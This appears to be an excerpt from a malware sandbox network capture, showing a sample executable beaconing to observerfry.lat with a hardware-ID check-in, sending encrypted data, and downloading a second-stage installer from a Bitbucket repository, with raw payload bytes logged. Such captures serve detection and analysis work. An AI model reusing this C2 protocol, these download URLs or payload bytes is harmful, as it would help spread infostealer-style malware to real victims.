2024-12-23 16:30:16 UTC	15331	OUT	Data Raw: a9 94 0b 82 75 c2 40 b3 5b 88 14 bf 29 f6 13 d6 e9 f2 c2 65 d6 23 fb e2 ee 35 d9 36 2b e3 fd fb f1 b9 6f 60 49 e7 e4 3d 60 64 0c e0 65 79 a6 bb 35 20 b8 32 b1 fb b7 d3 58 4d a6 44 61 ee 31 58 9c ff 52 ea 7e fc 31 d8 5f a9 14 17 8c 2c 45 6a b3 f4 c3 2a 67 4e 4f 93 2d b1 f3 47 eb 15 b1 4d 8c ec cc d2 78 c0 e3 e4 c4 39 cc 32 42 68 1e c6 5c 7f 76 98 5d a4 e2 a9 e9 cb 39 c1 fe 1e 48 d1 fc 08 da 1a 83 bb 96 9b aa 67 78 f6 2d 99 bf 35 4f 42 e2 11 54 ed 3d 38 5c 92 8a a9 42 7a 98 7e 0b aa 44 a0 61 48 29 60 66 f4 87 2b d7 f1 8c 43 76 48 c6 68 51 92 8e 72 f0 22 a7 88 89 3d 3e 8c e9 8a a1 e2 f7 f6 db 72 c6 a1 5a 85 ca a7 a4 71 3d 18 b4 5b a7 05 e3 b7 3a 69 56 f8 8a 45 fa 93 a8 08 90 f1 f7 b9 bf 44 58 a5 18 10 78 51 1c 0f e1 a9 24 bb 20 65 c7 4f 55 82 a5 a8 3d 88 7b Data Ascii: u@[)e#56+o`I=`dey5 2XMDa1XR~1_,Ej*gNO-GMx92Bh\v]9Hgx-5OBT=8\Bz~DaH)`f+CvHhQr"=>rZq=[:iVEDXxQ$ eOU={
2024-12-23 16:30:16 UTC	15331	OUT	Data Raw: 1d 54 d9 c1 e3 10 8f 6a 10 cd 61 b8 fd 5b 14 1e b9 58 ae 03 e7 7b 2f 5f 84 cd 10 40 4a a7 2e 37 25 2b 67 7d d2 66 b4 c2 88 b3 13 1d 62 a4 1a 93 2f 21 e5 d8 00 89 4a f9 23 50 fb 49 21 06 db 5f 2f 19 0a 15 dc 7a 1d 4f b3 d5 01 10 27 e1 33 67 b9 2f 37 74 fd bb 7d 82 34 b0 ac 9e 7e cc 0f e6 f4 61 03 4a 20 f8 10 92 02 31 86 a3 44 40 63 11 65 af 6e ef 07 17 72 c9 d2 fb 77 ed 5f 57 ed 1e d8 0d 0f 0d c0 58 03 de ad 67 3c 6a 36 27 00 90 cb 06 4b 51 f2 8f 8d de dd b8 c5 09 74 b9 4a b1 1a 4e 25 81 a2 b4 e1 99 a6 bc 8f 3a 26 24 34 cf 0d 01 af 61 1d 0b 0f 97 d9 8f 5c ec 82 41 af 71 11 d2 62 46 60 74 ea dd d5 f6 bd 71 ea 23 59 72 88 bb 3e 96 d4 8c a0 d6 1f 22 3c 2d bd b2 2f 78 03 56 d5 b3 21 70 2c 8a f2 bf 4e c8 73 72 22 ff bb 8c f4 44 07 0a 92 85 e4 00 ad 1d be 7b 6a Data Ascii: Tja[X{/_@J.7%+g}fb/!J#PI!_/zO'3g/7t}4~aJ 1D@cenrw_WXg<j6'KQtJN%:&$4a\AqbF`tq#Yr>"<-/xV!p,Nsr"D{j
2024-12-23 16:30:16 UTC	15331	OUT	Data Raw: b7 0a 6f fc 79 6e b1 3b fc fc 69 60 0e 6a 8b 1e 7e f5 b1 19 55 a5 29 26 1c 50 ef d3 05 46 bf 76 07 ad 04 2c e2 56 75 be 0e 0a 84 84 87 2f 0c 0e f9 20 d8 50 8f 52 69 f1 b2 db 9c 4c 45 19 af c6 27 63 b2 a8 61 ac 9b 92 fa 73 b3 6a 7e 3a 86 c3 74 33 5e bc 38 c5 9c 6e b9 8b 00 c6 26 e9 41 3f 16 af 6f bd 32 e2 45 23 f5 c3 d9 fd 25 5f 33 fb f5 63 b1 07 a8 2a ec b1 c3 e9 a7 3f 32 3d de 87 74 b4 41 b7 37 93 7f 0a 59 b2 66 92 f9 4b de 9b b8 a7 5a 9f 50 a3 df bf fc 68 f8 09 68 a9 3c bc f1 8f dd e3 f4 fc 73 42 ac e1 3d d0 76 76 6f d5 34 9f a2 ec c6 9c e1 86 8c ed 8a 9d 46 81 f9 a2 ee cb ce 8b 4e ab ba 31 dc cd 9c a1 a2 04 d6 96 8e 10 d9 95 74 b8 ea 61 35 e7 0c f4 ca 7f 7d 63 28 e4 0a 38 58 56 dd e6 cd 9e 7e 78 20 b7 a6 73 4d 87 93 57 69 a3 39 32 38 fa e5 00 68 a7 58 Data Ascii: oyn;i`j~U)&PFv,Vu/ PRiLE'casj~:t3^8n&A?o2E#%_3c*?2=tA7YfKZPhh<sB=vvo4FN1ta5}c(8XV~x sMWi928hX
2024-12-23 16:30:16 UTC	15331	OUT	Data Raw: a6 3c 16 1f ef 14 06 51 9b 25 9f c2 ed de cd 25 32 12 c7 c4 e7 f4 45 42 d7 38 ce d2 60 dd 4d 1d 10 55 08 cc 89 f5 ac bd b6 6e 02 12 02 08 d9 d3 67 d9 26 7e 50 e9 5d ac cf d3 74 e9 db 0e 96 19 4e d9 46 c2 c2 b0 cd 70 55 54 c8 d9 6f d5 97 1f 28 85 7b 6e 96 24 90 d1 d1 06 3c 31 71 17 93 37 cd 8c 51 61 c6 46 88 1c f6 52 75 0a a6 51 af c0 22 34 e8 a9 fa 66 a3 f6 61 66 93 e0 88 09 c9 5c bb 69 b9 4d 4d 5b 95 91 ca cb 9e a7 12 30 0f b1 05 d2 a1 ee 9f 92 0b 12 75 c0 8c c1 08 a7 82 69 8c 9c 3b 40 36 56 d4 9f 12 b3 44 47 96 61 c4 85 5f 2a c2 b8 cd 76 48 4f ad c0 16 52 e9 0b 4b 5d 93 c9 74 d6 7b af c9 d8 83 6d 1c a5 c4 2f 1f 58 bf 3b 24 26 84 f6 fb 7d a8 03 10 d3 c2 2f 46 7e 4d d4 4e 42 13 e5 91 1d 1d 14 29 17 e2 4f 7a e1 52 dd 41 64 c0 63 c8 aa 31 5b 67 eb f4 3d 8a Data Ascii: <Q%%2EB8`MUng&~P]tNFpUTo({n$<1q7QaFRuQ"4faf\iMM[0ui;@6VDGa_*vHORK]t{m/X;$&}/F~MNB)OzRAdc1[g=
2024-12-23 16:30:16 UTC	15331	OUT	Data Raw: 5f 30 18 ec be e4 1b 51 53 3b 3d 7a 72 5c 9f f9 52 f6 89 c2 68 80 df 68 88 8a 70 df 89 a0 fa c8 a7 dc 65 52 88 3e 33 c2 12 19 92 d8 cd e8 1b 5e db 49 63 fa 66 70 22 0e b8 be 6d ac 3d 5f f0 8e a1 1f 52 76 8a 3d b8 e8 7e ab c4 5c f6 b8 c9 97 86 f7 77 b3 6e cd 18 16 04 e0 f3 3a a7 cd 31 0b 9f ec c8 e7 6d 72 13 6a 9e 0a 0e 6d 34 48 0d f7 19 36 b8 e1 17 e6 f1 ac 7b 24 19 3f fb 0a 4b 8b 60 37 7f 58 cb 64 e5 8f 9c da 09 e2 47 3f 43 54 22 43 a3 68 87 50 03 1f b8 09 fd 05 7f 0e fe e7 3e 8b 8d 57 0e 9a f0 78 c7 ca df 26 a7 61 24 64 26 8d 32 0d a0 53 df cf 99 4c b0 b8 86 73 37 92 d9 8b 0a e0 91 c9 d3 dd 21 a2 8a 70 f2 da 4f 40 70 73 18 36 bb db d0 80 86 13 83 8d c6 aa a3 fb 8b 31 7e 5c 25 eb 9a 12 24 26 b8 e7 c9 1a 33 09 f9 10 5c a4 fe aa 5a 6e 96 c0 b2 c3 0d 4f 6b Data Ascii: _0QS;=zr\RhhpeR>3^Icfp"m=_Rv=~\wn:1mrjm4H6{$?K`7XdG?CT"ChP>Wx&a$d&2SLs7!pO@ps61~\%$&3\ZnOk
2024-12-23 16:30:20 UTC	1145	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 16:30:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=i40n54ae9rcnibsodj8rd4os59; expires=Fri, 18 Apr 2025 10:16:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JipzHrgPy%2B0ZkL%2B0xS%2B%2Fhj4gUyLhpsoYvis%2BtlkODKc%2BdNqUuy2u9%2Fd5TjE0XXWy%2Fp3zR8G5EOUU%2FYruddJbArKbMr9jk5LqpfVEQZEK3EMJMWi%2BXwJEqtyoqUJpFWyMIH8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f69bc3a1aa84322-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1719&rtt_var=648&sent=323&recv=613&lost=0&retrans=0&sent_bytes=2836&recv_bytes=590315&delivery_rate=1682997&cwnd=221&unsent_bytes=0&cid=5bf8f59360483d32&ts=4336&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49741	172.67.199.72	443	7008	C:\Users\user\Desktop\NAnOVCOt4L.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 16:30:22 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 88 Host: observerfry.lat
2024-12-23 16:30:22 UTC	88	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 30 43 34 33 42 32 44 38 39 42 35 35 31 32 35 45 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=0C43B2D89B55125EAC8923850305D13E
2024-12-23 16:30:23 UTC	1123	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 16:30:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2sfit9pc2qlc987rbmkhnpninb; expires=Fri, 18 Apr 2025 10:17:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cxo%2B39RJvW0f38dqvSpxOb9EiEgRjvvdgWD3wWYbzC%2BMHV8aPLXcCtvRAAEKeKoir8neoBJVMlx%2BZggItXYtFdNmH9udTKskmSUZTg8nLJQYFQUn4nJS6527erHB%2BZ1m8a4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f69bc5eee16c46b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1485&rtt_var=742&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4214&recv_bytes=987&delivery_rate=60394&cwnd=223&unsent_bytes=0&cid=c2036babe1211b4e&ts=865&x=0"
2024-12-23 16:30:23 UTC	246	IN	Data Raw: 31 31 30 0d 0a 5a 31 79 33 72 6d 67 33 39 34 6e 74 61 6a 4d 4e 6e 37 35 71 4e 51 48 78 75 54 65 70 34 49 6a 30 2f 72 51 55 38 4d 7a 75 37 4c 41 38 4a 35 58 62 53 67 33 56 34 5a 6b 65 51 33 36 6c 34 6b 56 70 4c 70 50 51 51 38 75 56 36 35 2b 62 77 44 71 66 76 6f 6d 77 6e 77 6f 6c 32 63 73 66 51 4a 6a 37 68 68 6c 44 62 50 7a 62 57 77 63 79 77 6f 67 46 39 63 2f 37 6c 35 44 51 53 4e 2b 6f 67 5a 76 65 43 7a 50 57 79 68 74 72 32 4d 2b 43 47 46 35 73 36 38 6f 44 57 32 61 79 30 56 62 62 69 66 79 56 6e 4e 68 78 33 71 6d 57 69 5a 4a 4c 66 74 48 61 53 67 33 48 70 63 38 50 45 54 65 75 77 30 5a 4f 49 34 53 62 44 59 75 49 2f 49 43 4f 6a 6b 6a 66 6b 4d 48 64 69 46 4a 79 68 5a 39 64 47 63 61 34 33 6b 51 43 4f 38 4f 52 42 56 4e 6e 72 5a 5a 54 7a Data Ascii: 110Z1y3rmg394ntajMNn75qNQHxuTep4Ij0/rQU8Mzu7LA8J5XbSg3V4ZkeQ36l4kVpLpPQQ8uV65+bwDqfvomwnwol2csfQJj7hhlDbPzbWwcywogF9c/7l5DQSN+ogZveCzPWyhtr2M+CGF5s68oDW2ay0VbbifyVnNhx3qmWiZJLftHaSg3Hpc8PETeuw0ZOI4SbDYuI/ICOjkjfkMHdiFJyhZ9dGca43kQCO8ORBVNnrZZTz
2024-12-23 16:30:23 UTC	33	IN	Data Raw: 49 61 6d 6b 59 62 52 4e 74 7a 75 69 4a 69 53 58 57 79 62 6a 41 30 56 7a 62 69 51 4e 77 3d 3d 0d 0a Data Ascii: IamkYbRNtzuiJiSXWybjA0VzbiQNw==
2024-12-23 16:30:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49743	185.166.143.50	443	7008	C:\Users\user\Desktop\NAnOVCOt4L.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 16:30:24 UTC	248	OUT	GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: bitbucket.org
2024-12-23 16:30:25 UTC	5939	IN	HTTP/1.1 302 Found Date: Mon, 23 Dec 2024 16:30:25 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Server: AtlassianEdge Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNPCIKNTEK&Signature=NPkElaCIUra%2B8CY2WTSMaYA38rA%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJGMEQCIBPwktU7vwx5ZkBAAYg9LY6DCDw%2BpdcEq%2FSybok0mFOWAiBp8ugOQPLS5ACZQ0eTcEa8GCUh%2FWp5YOXEDMo2EuvuFyqwAgja%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMJ%2B29cHRcGcGCbaH4KoQCEYYcB0oYVr9KvTmSfqMdrA8f8ZhXQBhDiXC9Lhou4UAHflo7HJJ0qqJaAvFQ89tSJV%2B7no6eUg9U6xG5hgTXZZzSXtZYaqTdxNbfKYiqL4zkoEeileC70XlxUFY1X82eJXK%2BpiN28pRvStVT1935IbT4YnNERLSjTV%2BMOkkbcu4dZCcGbnEOJBrufoZyTqh3IRYGOsBAwCTbJ2tE4XbfSLs9c6P5WiaswNTwuYTEqeWPDeAGAeQwXePmHm%2FVuodrWeXwmk2%2B6ZKJsVPQUU46HfIoIL6FjLv2CGbbV%2FNX5V9KVIh%2Begp0Q4rNYXCpozekYprZ70CI%2FPtse5JwVk8gyJXObI4wup6muwY6ngHSL3ALC5Tv4krbVPk327Pxc31%2F47CucLuq9ZtjWZP6vcokZXGAhVvN8qPrvbr%2FsaDVknYNIPZn5c7%2B% [TRUNCATED] Expires: Mon, 23 Dec 2024 16:30:25 GMT Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private X-Used-Mesh: False Vary: Accept-Language, Origin Content-Language: en X-View-Name: bitbucket.apps.downloads.views.download_file X-Dc-Location: Micros-3 X-Served-By: 45e47513042b X-Version: c9b3998323c0 X-Static-Version: c9b3998323c0 X-Request-Count: 2337 X-Render-Time: 0.061541080474853516 X-B3-Traceid: 76607f1905f242ccb24392ec448266e1 X-B3-Spanid: 9819bcf2a7c8f9cd X-Frame-Options: SAMEORIGIN Content-Security-Policy: object-src 'none'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; connect-src bitbucket.org .bitbucket.org bb-inf.net .bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.s [TRUNCATED] X-Usage-Quota-Remaining: 999165.057 X-Usage-Request-Cost: 852.77 X-Usage-User-Time: 0.018500 X-Usage-System-Time: 0.007083 X-Usage-Input-Ops: 0 X-Usage-Output-Ops: 0 Age: 0 X-Cache: MISS X-Content-Type-Options: nosniff X-Xss-Protection: 1; mode=block Atl-Traceid: 76607f1905f242ccb24392ec448266e1 Atl-Request-Id: 76607f19-05f2-42cc-b243-92ec448266e1 Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600} Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"} Server-Timing: atl-edge;dur=170,atl-edge-internal;dur=4,atl-edge-upstream;dur=168,atl-edge-pop;desc="aws-eu-central-1" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	3.5.27.149	443	7008	C:\Users\user\Desktop\NAnOVCOt4L.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 16:30:27 UTC	1346	OUT	GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNPCIKNTEK&Signature=NPkElaCIUra%2B8CY2WTSMaYA38rA%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJGMEQCIBPwktU7vwx5ZkBAAYg9LY6DCDw%2BpdcEq%2FSybok0mFOWAiBp8ugOQPLS5ACZQ0eTcEa8GCUh%2FWp5YOXEDMo2EuvuFyqwAgja%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMJ%2B29cHRcGcGCbaH4KoQCEYYcB0oYVr9KvTmSfqMdrA8f8ZhXQBhDiXC9Lhou4UAHflo7HJJ0qqJaAvFQ89tSJV%2B7no6eUg9U6xG5hgTXZZzSXtZYaqTdxNbfKYiqL4zkoEeileC70XlxUFY1X82eJXK%2BpiN28pRvStVT1935IbT4YnNERLSjTV%2BMOkkbcu4dZCcGbnEOJBrufoZyTqh3IRYGOsBAwCTbJ2tE4XbfSLs9c6P5WiaswNTwuYTEqeWPDeAGAeQwXePmHm%2FVuodrWeXwmk2%2B6ZKJsVPQUU46HfIoIL6FjLv2CGbbV%2FNX5V9KVIh%2Begp0Q4rNYXCpozekYprZ70CI%2FPtse5JwVk8gyJXObI4wup6muwY6ngHSL3ALC5Tv4krbVPk327Pxc31%2F47CucLuq9ZtjWZP6vcokZXGAhVvN8qPrvbr%2FsaDVknYNIPZn5c7%2B%2B8TnOfmVHZMxoeQ%2BrslSYbsokKnlORCBuQH6sGSNB [TRUNCATED] Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: bbuseruploads.s3.amazonaws.com
2024-12-23 16:30:27 UTC	586	IN	HTTP/1.1 200 OK x-amz-id-2: gbm3nOd3YTdTnM8WSS74rVLxgAaHrAlQNf5JXA9w2tmycf2erDKWg6dZ18Sf8DpISZ8CjrTOCORCUjgRhem2CIa2indh4FbEAbdt7gdK55M= x-amz-request-id: 0TQ2M7R0D827CP6F Date: Mon, 23 Dec 2024 16:30:28 GMT Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT ETag: "73565a0bcdcb7ff5f9ce005a2530e215" x-amz-server-side-encryption: AES256 x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS Content-Disposition: attachment; filename="FormattingCharitable.exe" Accept-Ranges: bytes Content-Type: application/x-msdownload Content-Length: 1325507 Server: AmazonS3 Connection: close
2024-12-23 16:30:27 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 f0 0b 00 00 42 00 00 af 38 00 00 00 10 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8
2024-12-23 16:30:27 UTC	438	IN	Data Raw: 00 ff 75 f8 e8 bb f1 ff ff e9 7b 03 00 00 ff 75 fc e8 ae f1 ff ff 33 db 81 7d 0c 05 04 00 00 75 11 89 5d 10 c7 45 14 01 00 00 00 c7 45 0c 0f 04 00 00 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 dc 00 00 00 8b 7d 14 39 45 0c 74 0d 81 7f 04 08 04 00 00 0f 85 c7 00 00 00 f7 05 08 eb 47 00 00 02 00 00 75 79 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 6b 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 f4 fb ff ff 3b c3 7c 56 8b 55 e8 8b c8 69 c9 20 40 00 00 8d 54 11 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 c2 c4 ff ff a1 08 eb 47 00 33 c9 c1 e8 08 41 f7 d0 23 c1 89 4d 10 89 45 14 c7 45 0c 0f 04 00 00 3b fb 74 3e 81 7f 08 3d fe ff ff 75 0e ff 77 5c 53 68 19 04 00 00 ff 75 fc ff d6 81 7f 08 39 Data Ascii: u{u3}u]EE}Nt9E}9EtGuy9EtMyuk39EQu;\|VUi @Tu@@tyPG3A#MEE;t>=uw\Shu9
2024-12-23 16:30:28 UTC	16384	IN	Data Raw: 7d 0c 0b 04 00 00 75 32 a1 68 1d 44 00 3b c3 74 07 50 ff 15 2c 90 40 00 a1 6c 1d 44 00 3b c3 74 07 50 ff 15 30 91 40 00 89 1d 68 1d 44 00 89 1d 6c 1d 44 00 89 1d 10 eb 47 00 81 7d 0c 0f 04 00 00 0f 85 4b 01 00 00 53 53 e8 f4 c3 ff ff 39 5d 10 74 07 6a 08 e8 0d c6 ff ff 39 5d 14 74 3f ff 35 6c 1d 44 00 e8 d1 c4 ff ff 8b f8 57 e8 7e c4 ff ff 33 c0 33 c9 3b fb 7e 0e 8b 55 e4 39 1c 82 74 01 41 40 3b c7 7c f2 53 51 68 4e 01 00 00 ff 75 f8 ff d6 89 7d 14 c7 45 0c 20 04 00 00 53 53 e8 9d c3 ff ff a1 6c 1d 44 00 89 45 e0 a1 c8 ea 47 00 c7 45 c4 30 f0 00 00 89 5d e8 39 1d cc ea 47 00 0f 8e a1 00 00 00 8d 78 08 8b 45 e0 8b 4d e8 8b 04 88 3b c3 74 79 8b 0f 89 45 bc c7 45 b8 08 00 00 00 f7 c1 00 01 00 00 74 13 8d 47 10 c7 45 b8 09 00 00 00 89 45 c8 81 27 ff fe ff ff Data Ascii: }u2hD;tP,@lD;tP0@hDlDG}KSS9]tj9]t?5lDW~33;~U9tA@;\|SQhNu}E SSlDEGE0]9GxEM;tyEEtGEE'
2024-12-23 16:30:28 UTC	1024	IN	Data Raw: 00 00 48 00 69 00 64 00 65 00 57 00 69 00 6e 00 64 00 6f 00 77 00 00 00 00 00 50 00 6f 00 70 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 65 00 6d 00 70 00 74 00 79 00 00 00 00 00 45 00 78 00 63 00 68 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 3c 00 20 00 25 00 64 00 20 00 65 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 73 00 00 00 52 00 4d 00 44 00 69 00 72 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 42 00 6f 00 78 00 3a 00 20 00 25 00 64 00 2c 00 22 00 25 00 73 00 22 00 00 00 44 00 65 00 6c 00 65 00 74 00 65 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 25 00 73 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 77 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 74 00 6f 00 20 00 22 00 25 00 73 Data Ascii: HideWindowPop: stack emptyExch: stack < %d elementsRMDir: "%s"MessageBox: %d,"%s"Delete: "%s"%sFile: wrote %d to "%s
2024-12-23 16:30:28 UTC	16384	IN	Data Raw: 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 2d 00 20 00 61 00 20 00 66 00 69 00 6c 00 65 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 65 00 78 00 69 00 73 00 74 00 73 00 00 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 65 00 72 00 72 00 3d 00 25 00 64 00 29 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 22 00 25 00 73 00 22 00 20 00 28 Data Ascii: CreateDirectory: can't create "%s" - a file already existsCreateDirectory: can't create "%s" (err=%d)CreateDirectory: "%s" (
2024-12-23 16:30:28 UTC	1024	IN	Data Raw: c2 94 29 53 54 f9 01 29 4f 36 46 8d e8 c7 e6 52 b1 3a d6 d7 02 ab 3a 7c 39 58 c5 d6 e5 20 f1 ec 08 ce 07 cd e8 df bf 7f 82 30 a8 57 9f 88 81 3d 7b 87 3d 3d 76 58 69 b7 f9 13 7f db ed 8d 09 ff d1 73 ec 8b 65 98 86 79 fa f2 e6 7a 40 df be 7d 13 00 c6 9f 7d d6 c6 c5 d3 9f bd 88 67 9e 79 a6 55 d8 60 c7 f7 ec d9 33 01 60 5c 47 a6 5b cd 7f e2 89 27 e2 d9 70 26 00 8c b7 95 47 1f 7d f4 b2 e0 c6 c1 45 74 eb f6 70 d4 93 0f 3e 19 33 fc 91 21 b5 53 9e 9a f0 a7 89 3d c7 fd f9 b9 47 fb d5 3d d8 fd c1 98 ae dd ba 46 61 19 36 81 6d 82 8d 5a 6b 24 e8 b0 e9 32 89 07 dc 28 8c e3 f9 71 fc 19 ab c3 26 31 9a 3f 0f f1 32 5e 6c 78 b6 b7 6f df 7e f9 cf 7e f6 b3 79 d0 16 d6 18 9c 2a c0 a9 01 31 01 72 f1 e5 c3 8c 98 00 68 15 34 0b da 65 75 2a 00 5a f7 c3 30 00 fd 37 1c 19 f4 dc ba Data Ascii: )ST)O6FR::\|9X 0W={==vXiseyz@}}gyU`3`\G['p&G}Etp>3!S=G=Fa6mZk$2(q&1?2^lxo~~y1rh4euZ07
